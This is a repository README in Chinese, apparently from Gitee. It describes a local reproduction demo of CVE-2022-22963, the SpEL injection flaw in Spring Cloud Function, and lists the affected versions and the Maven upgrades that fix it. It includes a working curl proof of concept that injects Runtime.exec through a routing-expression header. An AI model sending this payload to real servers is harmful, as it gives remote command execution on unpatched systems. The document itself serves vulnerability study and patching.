# spring-cloud-function-rce-CVE-2022-22963
**Repository Path**: luoex/spring-cloud-function-rce-CVE-2022-22963
## Basic Information
- **Project Name**: spring-cloud-function-rce-CVE-2022-22963
- **Description**: Spring Cloud Function SPEL注入漏洞
- **Primary Language**: Unknown
- **License**: Not specified
- **Default Branch**: master
- **Homepage**: None
- **GVP Project**: No
## Statistics
- **Stars**: 2
- **Forks**: 0
- **Created**: 2022-03-31
- **Last Updated**: 2022-12-07
## Categories & Tags
**Categories**: Uncategorized
**Tags**: None
## README
本示例对应CVE-2022-22963: Spring Expression Resource Access Vulnerability,参考链接如下:
- [https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function](https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function)
- [https://tanzu.vmware.com/security/cve-2022-22963](https://tanzu.vmware.com/security/cve-2022-22963)
## 复现方式
**复现效果:**
即执行注入请求后,会调用服务器端命令(本例即调起win计算器)
**方式1:直接运行测试用例**
[ScfApplicationTests.java -> testScfRce](src/test/java/com/example/demo/ScfApplicationTests.java)
**方式2:模拟对应请求**
首先启动当前应用,然后通过如下命令复现请求:
```bash
curl "http://localhost:8080/functionRouter"
-X "POST" -H "Content-Type: application/x-www-form-urlencoded"
-H "spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec('calc')"
-v
```
## 产生根源
依赖Spring Cloud Function(如spring-cloud-function-context, spring-cloud-function-web, spring-cloud-function-webflux等),
受影响的版本:Spring Cloud Function (3 <= version <= 3.2.2)
>注:
>此漏洞仅适用于依赖了Spring Cloud Function的应用,若未依赖相关模块则不受影响。
## 修复方式
目前Spring官方已在2022-03-29发布了Spring Cloud Function对应的修复版本,
- 3.1.x版本需升级到3.1.7
- 3.2.x版本需升级到3.2.3
本示例的修复需调整相关maven依赖如下:
```xml
org.springframework.cloud
spring-cloud-function-web
3.2.3
org.springframework.cloud
spring-cloud-function-context
3.2.3
org.springframework.cloud
spring-cloud-function-core
3.2.3
```